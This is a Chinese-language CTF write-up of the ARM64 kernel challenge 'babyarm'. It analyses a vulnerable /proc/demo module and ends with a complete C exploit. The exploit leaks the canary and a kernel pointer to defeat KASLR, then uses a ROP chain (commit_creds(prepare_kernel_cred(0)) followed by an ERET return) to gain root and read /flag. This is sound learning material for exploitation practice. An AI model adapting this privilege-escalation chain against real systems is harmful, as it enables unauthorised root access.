0%

ARM kernel pwn初探

babyarm 复现

1
2
3
4
5
6
7
8
9
10
# Launch the challenge guest: an AArch64 "virt" machine with 128 MiB of RAM,
# a single core/thread, no graphical display and the QEMU monitor disabled.
# `timeout` terminates the whole session after 60 seconds.
# The kernel command line routes the console to ttyAMA0, sets oops=panic with
# panic=1, and does not pass `nokaslr`.
timeout --foreground 60 qemu-system-aarch64 \
-m 128M \
-machine virt \
-cpu max \
-kernel ./Image \
-append "console=ttyAMA0 loglevel=3 oops=panic panic=1" \
-initrd ./rootfs.cpio \
-monitor /dev/null \
-smp cores=1,threads=1 \
-nographic
  • 没有给定nokaslr,默认开启地址随机化
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
#!/bin/sh
# Guest init script: mounts the pseudo filesystems, loads the challenge
# module, tightens a few sysctls, then hands the console to uid 1000.

# Pseudo filesystems needed by the rest of the script (/proc/sys is written
# below).
mount -t devtmpfs none /dev
mount -t proc none /proc
mount -t sysfs none /sys

# Load the challenge module and give /home/pwn to uid/gid 1000.
insmod /home/pwn/demo.ko
chown -R 1000:1000 /home/pwn

# Hardening sysctls; per the kernel sysctl documentation these restrict dmesg,
# kernel pointer printing and perf events for unprivileged users.
echo 1 > /proc/sys/kernel/dmesg_restrict
echo 1 > /proc/sys/kernel/kptr_restrict
echo 1 > /proc/sys/kernel/perf_event_paranoid
echo -e "\nBoot took $(cut -d' ' -f1 /proc/uptime) seconds\n"

# Interactive shell as uid 1000 on the controlling terminal.
cd /home/pwn
setsid cttyhack setuidgid 1000 sh

# Reached only after the shell above exits: clean up and power the guest off.
umount /proc

poweroff -f
  • dmesg_restrict
  • kptr_restrict
  • perf_event_paranoid

漏洞分析

IDA 分析内核模块发现只有 device_write 和 device_read 两个函数有用,但这两个函数的反编译结果都很乱

再加上对 ARM 架构不熟悉,逆向的过程花费了我不少时间,下面是我的思考过程:

函数 device_write

1
2
3
4
__int64 v21; // [xsp+B8h] [xbp+B8h]

StatusReg = _ReadStatusReg(ARM64_SYSREG(3, 0, 4, 1, 0));
v21 = *(_QWORD *)(StatusReg + 0x480);
  • 从位置上来看 v21 应该是 canary
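  • 前面的 _ReadStatusReg(ARM64_SYSREG(3, 0, 4, 1, 0)) 读取的是 SP_EL0(与后文 gadget 中的 msr sp_el0 是同一个寄存器编码),内核态下它保存当前进程 task_struct 的指针;canary 并不是由它“生成”的,而是从 task_struct + 0x480 处读出来的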

然后就到了我感觉最抽象的一段代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
if ( (*(_DWORD *)(StatusReg + 0x2C) & 0x200000) != 0
|| (v19 = *(_QWORD *)StatusReg, v8 = (unsigned __int64)buf, (v19 & 0x4000000) != 0) )
{
v8 = (unsigned __int64)buf & ((__int64)((_QWORD)buf << 8) >> 8);
}
v9 = 0xFFFFFFFFFFFFLL;
_CF = __CFADD__(v8, len);
v11 = v8 + len;
if ( v11 != 0 && _CF )
v9 = 0LL; // △
if ( _CF )
v11 = -1LL;
if ( (v11 != v9 + !_CF) & __CFSUB__(v11, v9, _CF) )
v12 = 0LL;
else // △
v12 = 1LL;
if ( v12 ) // △
{
if ( ((unsigned __int64)buf & ((__int64)((_QWORD)buf << 8) >> 8) & 0xFFFF000000000000LL) != 0 )
v13 = 0LL;
else
v13 = buf;
__asm { HINT #0x14 }
v17 = _arch_copy_from_user(demo_buf, v13, len);// 成功返回'0'
}
else
{
v17 = len;
}
if ( v17 ) // △
{
memset(&demo_buf[len - v17], 0, v17);
return 0xFFFFFFFFFFFFFFEALL; // 返回错误码
}
else
{
_memcpy(tmp, demo_buf);
return len;
}
  • demo_buf 的范围远比 tmp 大,因此有栈溢出

这段代码有很多未命名变量,宏定义,还有很多 if-else 语句,但我们可以从后向前分析:

  • 为了不让程序返回错误码 0xFFFFFFFFFFFFFFEALL,以上各个 if-else 语句都只能按照 “△” 标注的路线回溯
  • 直到第一个 if 执行:
1
2
3
4
if ( (*(_DWORD *)(StatusReg + 0x2C) & 0x200000) != 0
|| (v19 = *(_QWORD *)StatusReg,
v8 = (unsigned __int64)buf,
(v19 & 0x4000000) != 0) )

感觉程序在检查一些环境,没有实质性的操作,写一个 test.c 进行调试:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>

size_t user_sp_v;
size_t *user_sp = &user_sp_v;

/*
 * Minimal debugging harness from the write-up: opens /proc/demo and writes
 * 0x200 zero bytes to it so the module's write handler can be stepped through.
 *
 * Returns 0 after the write attempt, or 1 if the device node cannot be
 * opened.
 */
int main()
{
    int buf[0x200] = {0};
    int fd = open("/proc/demo", O_RDWR);

    /* Without this check a failed open would silently turn into write(-1, ...). */
    if (fd < 0) {
        perror("open /proc/demo");
        return 1;
    }

    if (write(fd, buf, 0x200) < 0) {
        perror("write /proc/demo");
    }

    close(fd);
    return 0;
}
  • 可以通过 /sys/module/demo/sections/.text 获取模块 .text 基地址
1
2
/home/pwn # cat /sys/module/demo/sections/.text
0xffffbcf41c9e3000
1
2
3
4
5
6
7
0xffffbe24d4559090    bl     #0xffffbe24da88b200           <0xffffbe24da88b200>

0xffffbe24da88b200 hint #0x22
0xffffbe24da88b204 add x5, x0, x2
0xffffbe24da88b208 mov x15, x1
0xffffbe24da88b20c mov x6, x0
0xffffbe24da88b210 cmp x2, #0x10
  • 其实到 _arch_copy_from_user(demo_buf, v13, len) 执行之前的操作都没有什么影响,可以直接忽略

函数 device_read

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
canary = *(_QWORD *)(_ReadStatusReg(ARM64_SYSREG(3, 0, 4, 1, 0)) + 0x480);
if ( length > 0x1000 )
return device_read_0((file *)length, buffer, length, 0LL);
_memcpy(demo_buf, tmp);
StatusReg = _ReadStatusReg(ARM64_SYSREG(3, 0, 4, 1, 0));
if ( (*(_DWORD *)(StatusReg + 44) & 0x200000) != 0
|| (v7 = (unsigned __int64)buffer, (*(_QWORD *)StatusReg & 0x4000000) != 0) )
{
v7 = (unsigned __int64)buffer & ((__int64)((_QWORD)buffer << 8) >> 8);
}
v8 = 0xFFFFFFFFFFFFLL;
_CF = __CFADD__(v7, length);
v10 = v7 + length;
if ( v10 != 0 && _CF )
v8 = 0LL;
if ( _CF )
v10 = -1LL;
if ( (v10 != v8 + !_CF) & __CFSUB__(v10, v8, _CF) )
v11 = 0LL;
else
v11 = 1LL;
v12 = length;
if ( v11 )
{
if ( ((unsigned __int64)buffer & ((__int64)((_QWORD)buffer << 8) >> 8) & 0xFFFF000000000000LL) != 0 )
v15 = 0LL;
else
v15 = buffer;
__asm { HINT #0x14 }
v12 = _arch_copy_to_user(v15, demo_buf, length);
}

  • 由于 tmp 和 canary 靠得很近,这里可以把 canary 拷贝到 demo_buf 中

入侵思路

栈溢出和泄露 canary 都很简单,关键是怎么提权并且回到用户态

内核开启了 PXN(作用类似 x86 上的 SMEP:内核态不能执行用户态页面中的代码),因此只能写 ROP,第一个 gadget 需要完成栈迁移的工作

常规获取 gadget 的工具 ropper/ROPgadget 不能使用:

1
2
filebytes.binary.BinaryError: Bad architecture
ropper --file ./Image --nocolor > g1 0.40s user 0.09s system 99% cpu 0.491 total
1
[Error] PE.getArch() - Bad Arch
  • 这就需要手动找 Gadget 了

内核里有个好用的 gadget:

1
2
3
4
5
6
7
8
.text:0000000000016950 00 00 80 52                   MOV             W0, #0
.text:0000000000016954 F3 53 41 A9 LDP X19, X20, [SP,#0x50+var_40]
.text:0000000000016958 F5 5B 42 A9 LDP X21, X22, [SP,#0x50+var_30]
.text:000000000001695C F7 63 43 A9 LDP X23, X24, [SP,#0x50+var_20]
.text:0000000000016960 F9 23 40 F9 LDR X25, [SP,#0x50+var_10]
.text:0000000000016964 FD 7B C5 A8 LDP X29, X30, [SP+0x50+var_50],#0x50
.text:0000000000016968 C0 03 5F D6 RET

这里有一个小坑需要注意:ARM 的 ret 指令和 x86 的有很大不同

  • ARM64 的 ret 不会像 x86 那样从栈上弹出返回地址,而是直接跳转到 LR(X30)寄存器中保存的地址

因此构造 ROP 链时的核心就是通过栈来控制 LR(X30) 寄存器:

  • 控制 X19 为 prepare_kernel_cred+4
  • 控制 X30 为 commit_creds+4
  • 执行 ret 时就可以执行 commit_creds(prepare_kernel_cred(0))

后续需要考虑返回用户态的问题:

ARM64使用 SVC 指令进入内核态,使用 ERET 指令返回用户态,ARM 在进入内核态之前会保存用户态所有寄存器状态,在返回时恢复

其中比较重要的寄存器有 SP_EL0、ELR_EL1、SPSR_EL1:

  • SP_EL0:保存用户态的栈指针
  • ELR_EL1:保存要返回的用户态 PC 指针
  • SPSR_EL1:保存返回用户态时要恢复的处理器状态(PSTATE),这里设置为 0x80001000

可以用下面这个 gadget 来填充上述数据:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
.text:0000000000011FE4 17 41 18 D5                   MSR             #0, c4, c1, #0, X23 /* msr	sp_el0, x23 */
.text:0000000000011FE8 DF 02 7C F2 TST X22, #0x10
.text:0000000000011FEC 40 00 00 54 B.EQ loc_11FF4
.text:0000000000011FEC
.text:0000000000011FF0 1F 20 03 D5 NOP
.text:0000000000011FF0
.text:0000000000011FF4
.text:0000000000011FF4 loc_11FF4 ; CODE XREF: sub_157D0-37E4↑j
.text:0000000000011FF4 80 B7 46 F9 LDR X0, [X28,#0xD68]
.text:0000000000011FF8 0B 00 00 14 B loc_12024
.text:0000000000011FF8
.text:0000000000011FF8 ; END OF FUNCTION CHUNK FOR sub_157D0
.text:0000000000011FFC
.text:0000000000011FFC ; =============== S U B R O U T I N E =======================================
.text:0000000000011FFC
.text:0000000000011FFC
.text:0000000000011FFC sub_11FFC
.text:0000000000011FFC
.text:0000000000011FFC ; FUNCTION CHUNK AT .text:0000000000012024 SIZE 00000050 BYTES
.text:0000000000011FFC
.text:0000000000011FFC C1 BF 00 D0 21 A0 00 91 ADRL X1, unk_180B028
.text:0000000000012004 80 D0 38 D5 MRS X0, #0, c13, c0, #4
.text:0000000000012008 21 68 60 F8 LDR X1, [X1,X0]
.text:000000000001200C C1 00 00 B4 CBZ X1, loc_12024
.text:000000000001200C
.text:0000000000012010 81 03 40 F9 LDR X1, [X28]
.text:0000000000012014 81 00 C8 37 TBNZ W1, #0x19, loc_12024
.text:0000000000012014
.text:0000000000012018 E0 3F 01 32 MOV W0, #0x80007FFF
.text:000000000001201C 01 00 80 52 MOV W1, #0
.text:0000000000012020 1F 20 03 D5 NOP
.text:0000000000012020
.text:0000000000012020 ; End of function sub_11FFC
.text:0000000000012020
.text:0000000000012024 ; START OF FUNCTION CHUNK FOR sub_157D0
.text:0000000000012024 ; ADDITIONAL PARENT FUNCTION sub_11FFC
.text:0000000000012024
.text:0000000000012024 loc_12024 ; CODE XREF: sub_157D0-37D8↑j
.text:0000000000012024 ; sub_11FFC+10↑j
.text:0000000000012024 ; sub_11FFC+18↑j
.text:0000000000012024 35 40 18 D5 MSR #0, c4, c0, #1, X21 /* msr elr_el1, x21 */
.text:0000000000012028 16 40 18 D5 MSR #0, c4, c0, #0, X22 /* msr spsr_el1, x22 */
.text:000000000001202C E0 07 40 A9 LDP X0, X1, [SP,#arg_0]
.text:0000000000012030 E2 0F 41 A9 LDP X2, X3, [SP,#arg_10]
.text:0000000000012034 E4 17 42 A9 LDP X4, X5, [SP,#arg_20]
.text:0000000000012038 E6 1F 43 A9 LDP X6, X7, [SP,#arg_30]
.text:000000000001203C E8 27 44 A9 LDP X8, X9, [SP,#arg_40]
.text:0000000000012040 EA 2F 45 A9 LDP X10, X11, [SP,#arg_50]
.text:0000000000012044 EC 37 46 A9 LDP X12, X13, [SP,#arg_60]
.text:0000000000012048 EE 3F 47 A9 LDP X14, X15, [SP,#arg_70]
.text:000000000001204C F0 47 48 A9 LDP X16, X17, [SP,#arg_80]
.text:0000000000012050 F2 4F 49 A9 LDP X18, X19, [SP,#arg_90]
.text:0000000000012054 F4 57 4A A9 LDP X20, X21, [SP,#arg_A0]
.text:0000000000012058 F6 5F 4B A9 LDP X22, X23, [SP,#arg_B0]
.text:000000000001205C F8 67 4C A9 LDP X24, X25, [SP,#arg_C0]
.text:0000000000012060 FA 6F 4D A9 LDP X26, X27, [SP,#arg_D0]
.text:0000000000012064 FC 77 4E A9 LDP X28, X29, [SP,#arg_E0]
.text:0000000000012068 FE 7B 40 F9 LDR X30, [SP,#arg_F0]
.text:000000000001206C FF 43 05 91 ADD SP, SP, #0x150
.text:0000000000012070 E0 03 9F D6 ERET

最后需要注意:不能执行 system("/bin/sh"),会触发缺页机制

完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>

/* Slot holding the saved user-mode stack pointer: written by save_status(),
 * read back by get_root(). */
size_t user_sp_v;
size_t *user_sp = &user_sp_v;
/* Scratch byte buffer for the flag contents (a buffer of bytes, not an array
 * of 0x1000 pointers). */
char tmpbuf[0x1000];

/* Values leaked from the module and derived from the leak in main(). */
size_t canary;
size_t kernel_addr;
size_t kernel_base;
size_t offset;

/* Link-time addresses relative to the 0xffff800008000000 base; main() adds
 * the computed KASLR offset to each of them before use. */
size_t commit_creds = 0xffff8000080a2258;
size_t prepare_kernel_cred = 0xffff8000080a24f8;
size_t gadget1 = 0xffff800008011fe4;
size_t gadget2 = 0xffff800008016950;

void save_status()
{
asm("mov x11, %0" : : "r" (user_sp));
asm("mov x12, sp");
asm("str x12, [x11]");
}

void get_root()
{
asm("mov x11, %0" : : "r" (user_sp));
asm("ldr x12, [x11]");
asm("mov sp, x12");

printf("root");
//system("/bin/sh");
int fd = open("/flag", 0);
read(fd, tmpbuf, 0x40);
write(1, tmpbuf, 0x40);
}

/*
 * Exploit entry point.
 *
 * 1. Saves the user stack pointer (save_status).
 * 2. Reads 0x200 bytes from /proc/demo and takes the stack canary and a
 *    kernel pointer out of the returned data.
 * 3. Derives the KASLR offset from the leaked pointer and rebases the
 *    function and gadget addresses.
 * 4. Fills the ROP payload and writes it back to /proc/demo.
 *
 * Returns 1 if the device cannot be opened or the leak read fails, 0 otherwise.
 */
int main()
{
    save_status();
    size_t buf[0x200] = {0};
    int fd = open("/proc/demo", O_RDWR);
    if (fd < 0) {
        perror("open /proc/demo");
        return 1;
    }

    /* Leak step: without valid data the payload below would carry a wrong
     * canary, so stop here if the read fails. */
    if (read(fd, buf, 0x200) < 0) {
        perror("read /proc/demo");
        close(fd);
        return 1;
    }
    canary = buf[12];
    kernel_addr = buf[2];
    /* size_t is printed with %zx. */
    printf("canary: 0x%zx\n", canary);
    printf("kernel_addr: 0x%zx\n", kernel_addr);

    /* 0xffff8000082376f8 is the value the leaked pointer has at the default
     * base 0xffff800008000000; the difference is the KASLR offset. */
    offset = kernel_addr - 0xffff8000082376f8;
    kernel_base = 0xffff800008000000 + offset;
    printf("kernel_base: 0x%zx\n", kernel_base);

    commit_creds = commit_creds + offset;
    prepare_kernel_cred = prepare_kernel_cred + offset;

    gadget1 = gadget1 + offset;
    gadget2 = gadget2 + offset;

    printf("gadget1: 0x%zx\n", gadget1);
    printf("gadget2: 0x%zx\n", gadget2);

    /* Payload layout (indices are 8-byte slots in buf). */
    buf[16] = canary;

    buf[18] = gadget2;
    buf[22] = prepare_kernel_cred + 4; /* X19 */
    buf[26] = 0;
    buf[32] = commit_creds + 4;        /* X30 */

    buf[36] = gadget2;
    buf[42] = gadget1;

    /* Presumably popped into X21/X22/X23 by gadget2 and then moved by gadget1
     * into ELR_EL1 / SPSR_EL1 / SP_EL0 -- verify against the gadget listing.
     * Pointers are converted explicitly; assigning them to size_t without a
     * cast is not valid C. */
    buf[45] = (size_t)get_root;
    buf[46] = 0x80001000;
    buf[47] = (size_t)buf;

    write(fd, buf, 0x200);
    close(fd);
    return 0;
}


小结:

第一次打 ARM 的内核题目,调试很久找不到 gadget,最后的 gadget 还是抄的别人的

太菜了,现在找 gadget 还很迷茫,以后有经验了再总结吧